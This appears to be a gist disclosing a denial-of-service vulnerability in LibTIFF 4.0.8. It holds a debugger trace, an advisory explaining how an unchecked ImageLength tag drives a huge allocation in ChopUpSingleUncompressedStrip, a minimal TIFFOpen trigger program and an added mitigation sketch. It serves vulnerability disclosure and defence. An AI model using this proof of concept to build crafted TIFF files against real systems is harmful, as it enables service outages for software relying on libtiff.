@dazhouzhou
Last active July 26, 2017 23:51
poc
----------------------------------------------------------------------------------------------------------------------------------------------[ source:tif_dirread.c+5701 ]----
5697 nstrips = TIFFhowmany_32(td->td_imagelength, rowsperstrip);
5698 if( nstrips == 0 )
5699 return;
5700
// tif=0x00007fffffffe028 -> [...] -> "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", newcounts=0x00007fffffffe040 -> 0x0000000020f222ec
->5701 newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
5702 "for chopped \"StripByteCounts\" array");
5703 newoffsets = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
5704 "for chopped \"StripOffsets\" array");
5705 if (newcounts == NULL || newoffsets == NULL) {
----------------------------------------------------------------------------------------------------------------------------------------------------------------[ threads ]----
[#0] Id 1, Name: "TIFFOpen", stopped, reason: SINGLE STEP
------------------------------------------------------------------------------------------------------------------------------------------------------------------[ trace ]----
[#0] 0x418d42->Name: ChopUpSingleUncompressedStrip(tif=0x67b010)
[#1] 0x414d2f->Name: TIFFReadDirectory(tif=0x67b010)
[#2] 0x419f76->Name: TIFFClientOpen(name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r", clientdata=0x7fff00000003, readproc=0x4210b6 <_tiffReadProc>, writeproc=0x421184 <_tiffWriteProc>, seekproc=0x421252 <_tiffSeekProc>, closeproc=0x4212a9 <_tiffCloseProc>, sizeproc=0x4212c9 <_tiffSizeProc>, mapproc=0x421311 <_tiffMapProc>, unmapproc=0x4213a6 <_tiffUnmapProc>)
[#3] 0x421421->Name: TIFFFdOpen(fd=0x3, name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r")
[#4] 0x421528->Name: TIFFOpen(name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r")
[#5] 0x404afd->Name: main()
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5701 newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
gef> p nstrips
$2 = 0x11223344
gef>
Title: LibTiff TIFFOpen Denial of Service Vulnerability
Version: V4.0.8
Credit: Yu Zhou of Ant-financial Light-Year Security Lab
Description
In LibTIFF 4.0.8, there is a denial of service vulnerability in the TIFFOpen function. A crafted input file leads to a denial of service.
During the TIFFOpen process, td_imagelength is not checked; its value can be directly controlled by the input file.
The ChopUpSingleUncompressedStrip function calls _TIFFCheckMalloc with an allocation size derived from td_imagelength. If td_imagelength is set so that the requested allocation approaches the size of system memory, it will hang the system or trigger the OOM killer.
The vulnerability can affect a lot of software (e.g. ImageMagick) and systems (e.g. Debian) that use the libtiff library, because it is triggered inside the TIFFOpen function.
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include "tiffio.h"

/* Minimal trigger: TIFFOpen reads the directory, and for a single-strip
 * uncompressed image ChopUpSingleUncompressedStrip allocates two arrays
 * sized from td_imagelength before any pixel data is read. */
int main(void)
{
    TIFF *tif;

    tif = TIFFOpen("crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", "r");
    if (tif == NULL)
    {
        printf("TIFFOpen error!\n");
        return 0;
    }
    TIFFClose(tif);
    return 0;
}
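To make the allocation arithmetic concrete, the following added example (not from the gist or from libtiff itself) models how nstrips is derived from the untrusted ImageLength tag, how many bytes the two _TIFFCheckMalloc calls then request, and a defensive pre-check that bounds nstrips by the file size. TIFFhowmany_32 follows the libtiff macro; the file-size bound and a rowsperstrip of 1 (so td_imagelength equals the nstrips value 0x11223344 shown in gef) are assumptions.

```c
/* Added example: models the chopped-strip allocation and a sanity bound.
 * Not the gist's PoC and not libtiff's own fix. */
#include <stdint.h>
#include <stdio.h>

typedef uint32_t uint32;
typedef uint64_t uint64;

/* libtiff's rounding-up division; yields 0 when x + (y - 1) would overflow. */
#define TIFFhowmany_32(x, y) \
    (((uint32)(x) < (0xffffffffU - (uint32)((y) - 1))) \
        ? ((((uint32)(x)) + (((uint32)(y)) - 1)) / ((uint32)(y))) : 0U)

/* Strip count the chopping code derives from the untrusted ImageLength tag. */
uint32 chopped_nstrips(uint32 imagelength, uint32 rowsperstrip)
{
    if (rowsperstrip == 0)
        return 0;
    return TIFFhowmany_32(imagelength, rowsperstrip);
}

/* Heap requested by the two _TIFFCheckMalloc calls (newcounts and newoffsets),
 * each nstrips * sizeof(uint64); computed in 64 bits so it cannot wrap. */
uint64 chopped_alloc_bytes(uint32 imagelength, uint32 rowsperstrip)
{
    uint64 nstrips = chopped_nstrips(imagelength, rowsperstrip);
    return 2 * nstrips * (uint64)sizeof(uint64);
}

/* Assumed mitigation: every chopped strip must still be read from inside the
 * file, so more strips than bytes in the file can only come from a bogus
 * ImageLength. Returns 1 if chopping is plausible, 0 if it should be skipped. */
int chopping_is_plausible(uint32 imagelength, uint32 rowsperstrip,
                          uint64 file_size)
{
    uint64 nstrips = chopped_nstrips(imagelength, rowsperstrip);
    if (nstrips == 0)
        return 0;
    return nstrips <= file_size;
}

int main(void)
{
    uint32 len = 0x11223344U;  /* nstrips printed by gef, rowsperstrip assumed 1 */
    printf("nstrips=%u bytes=%llu plausible(4 KiB file)=%d\n",
           (unsigned)chopped_nstrips(len, 1),
           (unsigned long long)chopped_alloc_bytes(len, 1),
           chopping_is_plausible(len, 1, 4096));
    return 0;
}
```

With the value from the crash the two arrays alone ask for about 4.6 GB before a single byte of pixel data is read, which is why the input hangs the process or wakes the OOM killer.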